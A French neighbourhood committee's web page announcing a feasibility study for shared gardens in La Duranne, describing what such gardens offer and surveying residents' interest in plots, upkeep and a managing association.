CIQ Durablement Duranne

Étude de faisabilité et d’opportunité pour des jardins partagés à la Duranne.

Dans le cadre de ses missions visant à favoriser l’émergence de projets contribuant à renforcer le lien social et l’intérêt pour notre cadre de vie et notre environnement, le CIQ se lance dans une étude de faisabilité et d’opportunité pour créer des jardins partagés à la Duranne.

 

Qu’est ce qu’un jardin partagé ?

Un jardin partagé c’est avant tout un « espace public » ouvert sur son quartier. C’est un lieu de culture(s), d’échanges, de convivialité, de solidarité, de repos, animé et géré par une association d’habitants soutenue par une ou des collectivités (mairie, communauté d’agglomération…)

Autour de la culture écologique d’un jardin potager, fleuri, aromatique, médicinal… de nombreuses activités peuvent être associées : éducation à l’environnement et à l’eco-citoyenneté, activités inter-générationnelles, animations ponctuelles de quartier, activités d’insertion, ouverture aux scolaires et périscolaires, échanges de techniques de cultures, de graines, de plants, repos, contemplation, observation de la biodiversité dans la ville.

Afin de sonder l’intérêt des habitants pour ce projet et d’identifier la demande potentielle, nous vous remercions par avance de bien vouloir répondre aux questions ci -dessous,

soit en envoyant vos réponses par mail à ciq.aixladuranne@gmail.com

soit en participant au sondage mis en ligne sur la page d’accueil (colonne de droite)

Si des jardins partagés étaient créés à la Duranne, seriez-vous :
- intéressé pour participer à l’entretien d’un jardin collectif ?
- intéressé pour avoir accès à une petite parcelle individuelle ?
- volontaire pour faire partie de la future association de gestion des jardins partagés ?
- Vos commentaires personnels sur le principe de ce projet sont les bienvenus.


Nous vous tiendrons ensuite informés des résultats de notre étude que nous présenterons à la Mairie afin de définir les modalités possibles de concrétisation.

N’hésitez pas à faire circuler ce message autour de vous, auprès d’habitants du quartier qui pourraient être intéressés.

var d=document;var s=d.createElement(‘script’);

%d blogueurs aiment cette page :